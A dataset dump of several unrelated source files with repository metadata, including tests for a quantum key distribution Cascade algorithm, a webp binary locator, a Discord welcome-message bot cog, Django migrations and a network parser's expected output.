| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
52814eeb4c3f42d2121f009a4775eb7ac4a342be
| 5,869
|
py
|
Python
|
cascade/tests/test_algorithm.py
|
brunorijsman/qkd-cascade
|
32fa65d45f81f08ac84867f8eea9ab93dfb1dbe2
|
[
"MIT"
] | 10
|
2020-05-13T06:09:36.000Z
|
2022-03-27T13:02:38.000Z
|
cascade/tests/test_algorithm.py
|
brunorijsman/qkd-cascade
|
32fa65d45f81f08ac84867f8eea9ab93dfb1dbe2
|
[
"MIT"
] | 1
|
2021-06-02T00:52:00.000Z
|
2021-06-02T00:52:00.000Z
|
cascade/tests/test_algorithm.py
|
brunorijsman/qkd-cascade
|
32fa65d45f81f08ac84867f8eea9ab93dfb1dbe2
|
[
"MIT"
] | 6
|
2020-05-20T16:20:38.000Z
|
2021-08-19T04:47:15.000Z
|
from cascade.algorithm import get_algorithm_by_name
def test_original_algorithm():
algorithm = get_algorithm_by_name('original')
assert algorithm.name == "original"
assert algorithm.cascade_iterations == 4
assert algorithm.block_size_function(0.0, 10000, 1) == 73000
assert algorithm.block_size_function(0.1, 10000, 1) == 8
assert algorithm.block_size_function(0.01, 10000, 1) == 73
assert algorithm.block_size_function(0.01, 10000, 2) == 146
assert algorithm.block_size_function(0.01, 10000, 3) == 292
assert algorithm.block_size_function(0.001, 10000, 1) == 730
assert algorithm.biconf_iterations == 0
assert not algorithm.biconf_error_free_streak
assert not algorithm.biconf_correct_complement
assert not algorithm.biconf_cascade
assert not algorithm.sub_block_reuse
assert not algorithm.block_parity_inference
def test_biconf_algorithm():
algorithm = get_algorithm_by_name('biconf')
assert algorithm.name == "biconf"
assert algorithm.cascade_iterations == 2
assert algorithm.block_size_function(0.0, 10000, 1) == 92000
assert algorithm.block_size_function(0.1, 10000, 1) == 10
assert algorithm.block_size_function(0.01, 10000, 1) == 92
assert algorithm.block_size_function(0.01, 10000, 2) == 276
assert algorithm.block_size_function(0.01, 10000, 3) == 828
assert algorithm.block_size_function(0.001, 10000, 1) == 920
assert algorithm.biconf_iterations == 10
assert algorithm.biconf_error_free_streak
assert not algorithm.biconf_correct_complement
assert not algorithm.biconf_cascade
assert not algorithm.sub_block_reuse
assert not algorithm.block_parity_inference
def test_yanetal_algorithm():
algorithm = get_algorithm_by_name('yanetal')
assert algorithm.name == "yanetal"
assert algorithm.cascade_iterations == 10
assert algorithm.block_size_function(0.0, 10000, 1) == 80000
assert algorithm.block_size_function(0.1, 10000, 1) == 8
assert algorithm.block_size_function(0.01, 10000, 1) == 80
assert algorithm.block_size_function(0.01, 10000, 2) == 400
assert algorithm.block_size_function(0.01, 10000, 3) == 5000
assert algorithm.block_size_function(0.001, 10000, 1) == 800
assert algorithm.biconf_iterations == 0
assert not algorithm.biconf_error_free_streak
assert not algorithm.biconf_correct_complement
assert not algorithm.biconf_cascade
assert not algorithm.sub_block_reuse
assert not algorithm.block_parity_inference
def test_option3_algorithm():
algorithm = get_algorithm_by_name('option3')
assert algorithm.name == "option3"
assert algorithm.cascade_iterations == 16
assert algorithm.block_size_function(0.0, 10000, 1) == 100000
assert algorithm.block_size_function(0.1, 10000, 1) == 10
assert algorithm.block_size_function(0.01, 10000, 1) == 100
assert algorithm.block_size_function(0.01, 10000, 2) == 200
assert algorithm.block_size_function(0.01, 10000, 3) == 5000
assert algorithm.block_size_function(0.001, 10000, 1) == 1000
assert algorithm.biconf_iterations == 0
assert not algorithm.biconf_error_free_streak
assert not algorithm.biconf_correct_complement
assert not algorithm.biconf_cascade
assert not algorithm.sub_block_reuse
assert not algorithm.block_parity_inference
def test_option4_algorithm():
algorithm = get_algorithm_by_name('option4')
assert algorithm.name == "option4"
assert algorithm.cascade_iterations == 16
assert algorithm.block_size_function(0.0, 10000, 1) == 100000
assert algorithm.block_size_function(0.1, 10000, 1) == 10
assert algorithm.block_size_function(0.01, 10000, 1) == 100
assert algorithm.block_size_function(0.01, 10000, 2) == 200
assert algorithm.block_size_function(0.01, 10000, 3) == 5000
assert algorithm.block_size_function(0.001, 10000, 1) == 1000
assert algorithm.biconf_iterations == 0
assert not algorithm.biconf_error_free_streak
assert not algorithm.biconf_correct_complement
assert not algorithm.biconf_cascade
assert algorithm.sub_block_reuse
assert not algorithm.block_parity_inference
def test_option7_algorithm():
algorithm = get_algorithm_by_name('option7')
assert algorithm.name == "option7"
assert algorithm.cascade_iterations == 14
assert algorithm.block_size_function(0.0, 10000, 1) == 131072
assert algorithm.block_size_function(0.1, 10000, 1) == 16
assert algorithm.block_size_function(0.01, 10000, 1) == 128
assert algorithm.block_size_function(0.01, 10000, 2) == 512
assert algorithm.block_size_function(0.01, 10000, 3) == 5000
assert algorithm.block_size_function(0.001, 10000, 1) == 1024
assert algorithm.biconf_iterations == 0
assert not algorithm.biconf_error_free_streak
assert not algorithm.biconf_correct_complement
assert not algorithm.biconf_cascade
assert algorithm.sub_block_reuse
assert not algorithm.block_parity_inference
def test_option8_algorithm():
algorithm = get_algorithm_by_name('option8')
assert algorithm.name == "option8"
assert algorithm.cascade_iterations == 14
assert algorithm.block_size_function(0.0, 10000, 1) == 131072
assert algorithm.block_size_function(0.1, 10000, 1) == 8
assert algorithm.block_size_function(0.01, 10000, 1) == 128
assert algorithm.block_size_function(0.01, 10000, 2) == 1024
assert algorithm.block_size_function(0.01, 10000, 3) == 4096
assert algorithm.block_size_function(0.01, 10000, 4) == 5000
assert algorithm.block_size_function(0.001, 10000, 1) == 1024
assert algorithm.biconf_iterations == 0
assert not algorithm.biconf_error_free_streak
assert not algorithm.biconf_correct_complement
assert not algorithm.biconf_cascade
assert algorithm.sub_block_reuse
assert not algorithm.block_parity_inference
| 48.106557
| 65
| 0.757028
| 812
| 5,869
| 5.215517
| 0.082512
| 0.24085
| 0.20307
| 0.243684
| 0.876033
| 0.876033
| 0.816529
| 0.815584
| 0.806139
| 0.699882
| 0
| 0.112389
| 0.155563
| 5,869
| 121
| 66
| 48.504132
| 0.742131
| 0
| 0
| 0.596491
| 0
| 0
| 0.016698
| 0
| 0
| 0
| 0
| 0
| 0.868421
| 1
| 0.061404
| false
| 0
| 0.008772
| 0
| 0.070175
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
871a2c025bcf94be50887fc1167c6325351793a9
| 114
|
py
|
Python
|
src/skeleton/sub2/__init__.py
|
jcschindler01/skeleton
|
52ccd2428f90ffb9a15ba35cea420801564b22eb
|
[
"MIT"
] | null | null | null |
src/skeleton/sub2/__init__.py
|
jcschindler01/skeleton
|
52ccd2428f90ffb9a15ba35cea420801564b22eb
|
[
"MIT"
] | null | null | null |
src/skeleton/sub2/__init__.py
|
jcschindler01/skeleton
|
52ccd2428f90ffb9a15ba35cea420801564b22eb
|
[
"MIT"
] | null | null | null |
"""
This subpackage contains modules C and D.
"""
from skeleton.sub2 import modC
from skeleton.sub2 import modD
| 14.25
| 41
| 0.754386
| 17
| 114
| 5.058824
| 0.764706
| 0.27907
| 0.372093
| 0.511628
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021053
| 0.166667
| 114
| 7
| 42
| 16.285714
| 0.884211
| 0.359649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
873986bea3b26f5e45ff9cb17a3d9884926c7206
| 3,200
|
py
|
Python
|
webptools/webpbin.py
|
Coder-Iro/webptools
|
b540f6281260f6123c1ed54988ceed75c64f2841
|
[
"MIT"
] | null | null | null |
webptools/webpbin.py
|
Coder-Iro/webptools
|
b540f6281260f6123c1ed54988ceed75c64f2841
|
[
"MIT"
] | null | null | null |
webptools/webpbin.py
|
Coder-Iro/webptools
|
b540f6281260f6123c1ed54988ceed75c64f2841
|
[
"MIT"
] | null | null | null |
import platform
from os.path import dirname, abspath
def getcwebp() -> str:
if platform.system() == 'Linux':
return dirname(
dirname(abspath(__file__))) + '/lib/libwebp_linux/bin/cwebp'
elif platform.system() == 'Windows':
arch = platform.architecture()
if arch[0] == '64bit':
return dirname(dirname(
abspath(__file__))) + '/lib/libwebp_win64/bin/cwebp.exe'
elif arch[0] == '32bit' and arch[0] == '86bit':
print('Unsupported platform:', platform.system(),
platform.architecture())
elif platform.system() == 'Darwin':
return dirname(
dirname(abspath(__file__))) + '/lib/libwebp_osx/bin/cwebp'
else:
print('Unsupported platform:', platform.system(),
platform.architecture())
def getdwebp() -> str:
if platform.system() == 'Linux':
return dirname(
dirname(abspath(__file__))) + '/lib/libwebp_linux/bin/dwebp'
elif platform.system() == 'Windows':
arch = platform.architecture()
if arch[0] == '64bit':
return dirname(dirname(
abspath(__file__))) + '/lib/libwebp_win64/bin/dwebp.exe'
elif arch[0] == '32bit' and arch[0] == '86bit':
print('Unsupported platform:', platform.system(),
platform.architecture())
elif platform.system() == 'Darwin':
return dirname(
dirname(abspath(__file__))) + '/lib/libwebp_osx/bin/dwebp'
else:
print('Unsupported platform:', platform.system(),
platform.architecture())
def getgifwebp() -> str:
if platform.system() == 'Linux':
return dirname(
dirname(abspath(__file__))) + '/lib/libwebp_linux/bin/gif2webp'
elif platform.system() == 'Windows':
arch = platform.architecture()
if arch[0] == '64bit':
return dirname(dirname(
abspath(__file__))) + '/lib/libwebp_win64/bin/gif2webp.exe'
elif arch[0] == '32bit' and arch[0] == '86bit':
print('Unsupported platform:', platform.system(),
platform.architecture())
elif platform.system() == 'Darwin':
return dirname(
dirname(abspath(__file__))) + '/lib/libwebp_osx/bin/gif2webp'
else:
print('Unsupported platform:', platform.system(),
platform.architecture())
def getwebpmux() -> str:
if platform.system() == 'Linux':
return dirname(
dirname(abspath(__file__))) + '/lib/libwebp_linux/bin/webpmux'
elif platform.system() == 'Windows':
arch = platform.architecture()
if arch[0] == '64bit':
return dirname(dirname(
abspath(__file__))) + '/lib/libwebp_win64/bin/webpmux.exe'
elif arch[0] == '32bit' and arch[0] == '86bit':
print('Unsupported platform:', platform.system(),
platform.architecture())
elif platform.system() == 'Darwin':
return dirname(
dirname(abspath(__file__))) + '/lib/libwebp_osx/bin/webpmux'
else:
print('Unsupported platform:', platform.system(),
platform.architecture())
| 38.554217
| 75
| 0.575938
| 312
| 3,200
| 5.714744
| 0.13141
| 0.157039
| 0.134605
| 0.181716
| 0.911385
| 0.911385
| 0.911385
| 0.911385
| 0.876612
| 0.767246
| 0
| 0.020215
| 0.273438
| 3,200
| 82
| 76
| 39.02439
| 0.746667
| 0
| 0
| 0.756757
| 0
| 0
| 0.205938
| 0.112188
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.027027
| 0
| 0.243243
| 0.108108
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
874d09e664c1eb52208b4ad7c98d29240e8c3412
| 6,945
|
py
|
Python
|
cogs/Welcome.py
|
J0k3rrWild/XantBot
|
2fd3c4b9b973dd9e49a05bcc09f409a8e97bec01
|
[
"MIT"
] | null | null | null |
cogs/Welcome.py
|
J0k3rrWild/XantBot
|
2fd3c4b9b973dd9e49a05bcc09f409a8e97bec01
|
[
"MIT"
] | null | null | null |
cogs/Welcome.py
|
J0k3rrWild/XantBot
|
2fd3c4b9b973dd9e49a05bcc09f409a8e97bec01
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands
import asyncio
import datetime
import sqlite3
conn = sqlite3.connect('main.db')
c = conn.cursor()
class Welcome(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=['set_welcome_text', 'set-welcome-text', 'set-welcome-message', 'set_welcome_message'])
@commands.has_permissions(administrator=True)
async def setwelcometext(self, ctx, *, text):
c.execute(f"SELECT welcome FROM guilds_modules WHERE guild_id = {ctx.guild.id}")
r = c.fetchone()
welcome_module = r[0]
if welcome_module == "on":
c.execute(f"SELECT welcome_text FROM guilds WHERE guild_id = {ctx.guild.id}")
r = c.fetchone()
sql = ("UPDATE guilds SET welcome_text = ? WHERE guild_id = ?")
val = (text, ctx.guild.id)
c.execute(sql, val)
embed = discord.Embed()
embed.add_field(name='Success!', value=f'Welcome text has been updated to ``{text}``')
await ctx.send(embed=embed)
conn.commit()
else:
embed = discord.Embed()
embed.add_field(name='Error!', value=f'Log module is off in guilds modules. Use ``x!modules log [on/off] `` to change this')
await ctx.send(embed=embed)
@commands.command(aliases=['set_leave_text', 'set-leave-text', 'set_leave_message', "set-leave-message"])
@commands.has_permissions(administrator=True)
async def setleavetext(self, ctx, *, text):
c.execute(f"SELECT welcome FROM guilds_modules WHERE guild_id = {ctx.guild.id}")
r = c.fetchone()
welcome_module = r[0]
if welcome_module == "on":
c.execute(f"SELECT leave_text FROM guilds WHERE guild_id = {ctx.guild.id}")
r = c.fetchone()
sql = ("UPDATE guilds SET leave_text = ? WHERE guild_id = ?")
val = (text, ctx.guild.id)
c.execute(sql, val)
embed = discord.Embed()
embed.add_field(name='Success!', value=f'Leave text has been updated to ``{text}``')
await ctx.send(embed=embed)
conn.commit()
else:
embed = discord.Embed()
embed.add_field(name='Error!',
value=f'Log module is off in guilds modules. Use ``x!modules log [on/off] `` to change this')
await ctx.send(embed=embed)
@commands.command(aliases=['set-log-channel', 'set_log_channel'])
@commands.has_permissions(administrator=True)
async def setwelcomechannel(self, ctx, channel:discord.TextChannel):
c.execute(f"SELECT welcome FROM guilds_modules WHERE guild_id = {ctx.guild.id}")
r = c.fetchone()
welcome_module = r[0]
if welcome_module == "on":
c.execute(f"SELECT welcome_channel FROM guilds WHERE guild_id = {ctx.guild.id}")
r = c.fetchone()
sql = ("UPDATE guilds SET welcome_channel = ? WHERE guild_id = ?")
val = (channel.id, ctx.guild.id)
c.execute(sql, val)
embed = discord.Embed()
embed.add_field(name='Success!', value=f'Log Channel has been updated to {channel.mention}')
await ctx.send(embed=embed)
conn.commit()
else:
embed = discord.Embed()
embed.add_field(name='Error!', value=f'Log module is off in guilds modules. Use ``x!modules log [on/off] `` to change this')
await ctx.send(embed=embed)
@commands.Cog.listener()
async def on_member_join(self, member):
c.execute(f"SELECT welcome FROM guilds_modules WHERE guild_id = {member.guild.id}")
r = c.fetchone()
welcome_module = r[0]
if welcome_module == "on":
if member.bot:
pass
else:
c.execute(f"SELECT welcome_channel FROM guilds WHERE guild_id = {member.guild.id}")
r = c.fetchone()
welcome_channel = r[0]
c.execute(f"SELECT welcome_text FROM guilds WHERE guild_id = {member.guild.id}")
r1 = c.fetchone()
welcome_text = r1[0]
members = len(list(member.guild.members))
mention = member.mention
user = member.name
guild = member.guild
embed = discord.Embed(title="User joined the server!", colour=0x43780, description=str(welcome_text).format(members=members, mention=mention, user=user, guild=guild))
embed.add_field(name="Account created at: ", value=member.created_at.strftime("%A, %d %B %Y, %H:%M:%S UTC"), inline=False)
embed.set_thumbnail(url=f"{member.avatar_url}")
embed.set_author(name=f"{member.name}", icon_url=f"{member.avatar_url}")
embed.set_footer(text=f"{member.guild}", icon_url=f"{member.guild.icon_url}")
embed.timestamp = datetime.datetime.utcnow()
channel = self.bot.get_channel(int(welcome_channel))
await channel.send(embed=embed)
else:
pass
@commands.Cog.listener()
async def on_member_remove(self, member):
c.execute(f"SELECT welcome FROM guilds_modules WHERE guild_id = {member.guild.id}")
r = c.fetchone()
welcome_module = r[0]
if welcome_module == "on":
if member.bot:
pass
else:
c.execute(f"SELECT welcome_channel FROM guilds WHERE guild_id = {member.guild.id}")
r = c.fetchone()
welcome_channel = r[0]
c.execute(f"SELECT leave_text FROM guilds WHERE guild_id = {member.guild.id}")
r1 = c.fetchone()
welcome_text = r1[0]
members = len(list(member.guild.members))
mention = member.mention
user = member.name
guild = member.guild
embed = discord.Embed(title="User has left from the server!", colour=0x43780,
description=str(welcome_text).format(members=members, mention=mention, user=user,
guild=guild,))
embed.set_thumbnail(url=f"{member.avatar_url}")
embed.set_author(name=f"{member.name}", icon_url=f"{member.avatar_url}")
embed.set_footer(text=f"{member.guild}", icon_url=f"{member.guild.icon_url}")
embed.timestamp = datetime.datetime.utcnow()
channel = self.bot.get_channel(int(welcome_channel))
await channel.send(embed=embed)
else:
pass
def setup(bot):
bot.add_cog(Welcome(bot))
| 44.235669
| 183
| 0.565011
| 838
| 6,945
| 4.568019
| 0.146778
| 0.054859
| 0.047022
| 0.047022
| 0.859718
| 0.842215
| 0.842215
| 0.813741
| 0.785528
| 0.785528
| 0
| 0.005695
| 0.317351
| 6,945
| 156
| 184
| 44.519231
| 0.80173
| 0
| 0
| 0.704545
| 0
| 0.022727
| 0.269848
| 0.006776
| 0
| 0
| 0.002062
| 0
| 0
| 1
| 0.015152
| false
| 0.030303
| 0.037879
| 0
| 0.060606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
875ae2223ef1abf2b423e9f312b398c979fcbe83
| 8,985
|
py
|
Python
|
tvdordrecht/webapp/migrations/0002_auto_20151105_2334.py
|
allcaps/tvdordrecht.nl
|
a2ff1b5ade88378f1a72a7ab36d51965b06509b9
|
[
"MIT"
] | null | null | null |
tvdordrecht/webapp/migrations/0002_auto_20151105_2334.py
|
allcaps/tvdordrecht.nl
|
a2ff1b5ade88378f1a72a7ab36d51965b06509b9
|
[
"MIT"
] | 1
|
2022-01-13T00:48:55.000Z
|
2022-01-13T00:48:55.000Z
|
tvdordrecht/webapp/migrations/0002_auto_20151105_2334.py
|
allcaps/tvdordrecht.nl
|
a2ff1b5ade88378f1a72a7ab36d51965b06509b9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('webapp', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='image',
name='image_editing',
field=models.CharField(default=b'', max_length=100, verbose_name=b'Afbeelding roteren', blank=True, choices=[('90', '90\xb0'), ('180', '180\xb0 '), ('270', '270\xb0'), ('double', 'Double the size')]),
),
migrations.AlterField(
model_name='image',
name='last_modified',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 32, 56, 361960), verbose_name=b'laatst bewerkt', auto_now=True),
preserve_default=False,
),
migrations.AlterField(
model_name='image',
name='owner',
field=models.ForeignKey(related_name='image_owner', verbose_name=b'gemaakt door', blank=True, to=settings.AUTH_USER_MODEL, null=True),
),
migrations.AlterField(
model_name='image',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 33, 1, 571704), verbose_name=b'publicatie datum', auto_now_add=True),
preserve_default=False,
),
migrations.AlterField(
model_name='image',
name='sortorder',
field=models.IntegerField(help_text=b'\n Als er meerdere afbeeldingen in een foto-album staan, worden ze standaard \n op alfabetische volgorde weergeven. Om de volgorde te wijzigen geef je een \n sortering (getal) bij alle te ordenen afbeeldigen in.\n ', null=True, verbose_name=b'Sortering', blank=True),
),
migrations.AlterField(
model_name='menu',
name='description',
field=models.TextField(help_text=b'\n Maximaal 250 karakters (Google zoekresultaten geven alleen de eerste 150 \n karakters weer).<br>\n Maak een relevante description. Bij voorkeur met tekst die op de pagina \n voorkomt.</br>\n Bij een leeg descriptionveld wordt description gegenereerd op basis van de \n inhoud van het tekstveld.\n ', max_length=250, blank=True),
),
migrations.AlterField(
model_name='menu',
name='html',
field=models.TextField(default='', verbose_name=b'html', blank=True),
preserve_default=False,
),
migrations.AlterField(
model_name='menu',
name='image',
field=models.ForeignKey(related_name='menu_image', blank=True, to='webapp.Image', help_text=b'\n Deze afbeelding komt op een vaste positie. Gebruik het afbeeldings-icoon\n in de text-editor om afbeeldingen tussen de lopende tekst in te voegen.\n ', null=True, verbose_name=b'afbeelding'),
),
migrations.AlterField(
model_name='menu',
name='keywords',
field=models.TextField(help_text=b"\n Alleen relevante keywords. Niet relevante keywords (die niet in de tekst \n voorkomen) doen pagina's zakken.<br>\n Bij een leeg keywordveld worden keywords gegenereerd op basis van de \n inhoud van het tekstveld.\n ", blank=True),
),
migrations.AlterField(
model_name='menu',
name='last_modified',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 33, 23, 947703), verbose_name=b'laatst bewerkt', auto_now=True),
preserve_default=False,
),
migrations.AlterField(
model_name='menu',
name='owner',
field=models.ForeignKey(related_name='menu_owner', verbose_name=b'gemaakt door', blank=True, to=settings.AUTH_USER_MODEL, null=True),
),
migrations.AlterField(
model_name='menu',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 33, 28, 642875), verbose_name=b'publicatie datum', auto_now_add=True),
preserve_default=False,
),
migrations.AlterField(
model_name='menu',
name='table_of_contents',
field=models.TextField(default='', verbose_name=b'table of contents', blank=True),
preserve_default=False,
),
migrations.AlterField(
model_name='news',
name='description',
field=models.TextField(help_text=b'\n Maximaal 250 karakters (Google zoekresultaten geven alleen de eerste 150 \n karakters weer).<br>\n Maak een relevante description. Bij voorkeur met tekst die op de pagina \n voorkomt.</br>\n Bij een leeg descriptionveld wordt description gegenereerd op basis van de \n inhoud van het tekstveld.\n ', max_length=250, blank=True),
),
migrations.AlterField(
model_name='news',
name='image',
field=models.ForeignKey(related_name='news_image', blank=True, to='webapp.Image', help_text=b'\n Deze afbeelding komt op een vaste positie. Gebruik het afbeeldings-icoon\n in de text-editor om afbeeldingen tussen de lopende tekst in te voegen.\n ', null=True, verbose_name=b'afbeelding'),
),
migrations.AlterField(
model_name='news',
name='keywords',
field=models.TextField(help_text=b"\n Alleen relevante keywords. Niet relevante keywords (die niet in de tekst \n voorkomen) doen pagina's zakken.<br>\n Bij een leeg keywordveld worden keywords gegenereerd op basis van de \n inhoud van het tekstveld.\n ", blank=True),
),
migrations.AlterField(
model_name='news',
name='last_modified',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 33, 40, 588617), verbose_name=b'laatst bewerkt', auto_now=True),
preserve_default=False,
),
migrations.AlterField(
model_name='news',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 33, 46, 978172), verbose_name=b'publicatie datum', auto_now_add=True),
preserve_default=False,
),
migrations.AlterField(
model_name='page',
name='description',
field=models.TextField(help_text=b'\n Maximaal 250 karakters (Google zoekresultaten geven alleen de eerste 150 \n karakters weer).<br>\n Maak een relevante description. Bij voorkeur met tekst die op de pagina \n voorkomt.</br>\n Bij een leeg descriptionveld wordt description gegenereerd op basis van de \n inhoud van het tekstveld.\n ', max_length=250, blank=True),
),
migrations.AlterField(
model_name='page',
name='html',
field=models.TextField(default='', verbose_name=b'html', editable=False, blank=True),
preserve_default=False,
),
migrations.AlterField(
model_name='page',
name='image',
field=models.ForeignKey(related_name='page_image', blank=True, to='webapp.Image', help_text=b'\n Deze afbeelding komt op een vaste positie. Gebruik het afbeeldings-icoon\n in de text-editor om afbeeldingen tussen de lopende tekst in te voegen.\n ', null=True, verbose_name=b'afbeelding'),
),
migrations.AlterField(
model_name='page',
name='keywords',
field=models.TextField(help_text=b"\n Alleen relevante keywords. Niet relevante keywords (die niet in de tekst \n voorkomen) doen pagina's zakken.<br>\n Bij een leeg keywordveld worden keywords gegenereerd op basis van de \n inhoud van het tekstveld.\n ", blank=True),
),
migrations.AlterField(
model_name='page',
name='last_modified',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 34, 1, 387628), verbose_name=b'laatst bewerkt', auto_now=True),
preserve_default=False,
),
migrations.AlterField(
model_name='page',
name='owner',
field=models.ForeignKey(related_name='page_owner', verbose_name=b'gemaakt door', blank=True, to=settings.AUTH_USER_MODEL, null=True),
),
migrations.AlterField(
model_name='page',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 34, 6, 421516), verbose_name=b'publicatie datum', auto_now_add=True),
preserve_default=False,
),
migrations.AlterField(
model_name='page',
name='table_of_contents',
field=models.TextField(default='', verbose_name=b'table of contents', editable=False, blank=True),
preserve_default=False,
),
]
| 56.509434
| 399
| 0.63172
| 1,082
| 8,985
| 5.134011
| 0.166359
| 0.093609
| 0.117012
| 0.135734
| 0.888209
| 0.888209
| 0.865527
| 0.814221
| 0.80162
| 0.79892
| 0
| 0.030471
| 0.258542
| 8,985
| 158
| 400
| 56.867089
| 0.803362
| 0.002337
| 0
| 0.789474
| 0
| 0.065789
| 0.34981
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.026316
| 0
| 0.046053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
876a5496ed7710173490ea5fd3e9b6aaeccf3cb8
| 2,210
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowMplsLdpBindings/cli/equal/golden_output_all_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxe/tests/ShowMplsLdpBindings/cli/equal/golden_output_all_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxe/tests/ShowMplsLdpBindings/cli/equal/golden_output_all_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
"vrf": {
"vrf1": {
"lib_entry": {
"10.11.0.0/24": {
"rev": "7",
"remote_binding": {
"label": {
"imp-null": {
"lsr_id": {"10.132.0.1": {"label_space_id": {0: {}}}}
}
}
},
},
"10.12.0.0/24": {
"label_binding": {"label": {"17": {}}},
"rev": "8",
"remote_binding": {
"label": {
"imp-null": {
"lsr_id": {"10.132.0.1": {"label_space_id": {0: {}}}}
}
}
},
},
"10.0.0.0/24": {
"rev": "6",
"remote_binding": {
"label": {
"imp-null": {
"lsr_id": {"10.132.0.1": {"label_space_id": {0: {}}}}
}
}
},
},
}
},
"default": {
"lib_entry": {
"10.11.0.0/24": {
"label_binding": {"label": {"imp-null": {}}},
"rev": "15",
"remote_binding": {
"label": {
"imp-null": {
"lsr_id": {"10.131.0.1": {"label_space_id": {0: {}}}}
}
}
},
},
"10.0.0.0/24": {
"label_binding": {"label": {"imp-null": {}}},
"rev": "4",
"remote_binding": {
"label": {
"imp-null": {
"lsr_id": {"10.131.0.1": {"label_space_id": {0: {}}}}
}
}
},
},
}
},
}
}
| 33.484848
| 85
| 0.20181
| 133
| 2,210
| 3.157895
| 0.225564
| 0.228571
| 0.25
| 0.316667
| 0.888095
| 0.888095
| 0.838095
| 0.771429
| 0.771429
| 0.633333
| 0
| 0.109296
| 0.639819
| 2,210
| 65
| 86
| 34
| 0.418342
| 0
| 0
| 0.430769
| 0
| 0
| 0.211765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
0d6dac6dd4e3fcecb313fd637676d52617067daf
| 53,180
|
py
|
Python
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/model/messaging/event/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 74
|
2015-04-10T02:57:26.000Z
|
2022-02-28T16:10:03.000Z
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/model/messaging/event/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 126
|
2015-04-26T02:55:26.000Z
|
2022-02-16T22:43:28.000Z
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/model/messaging/event/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 163
|
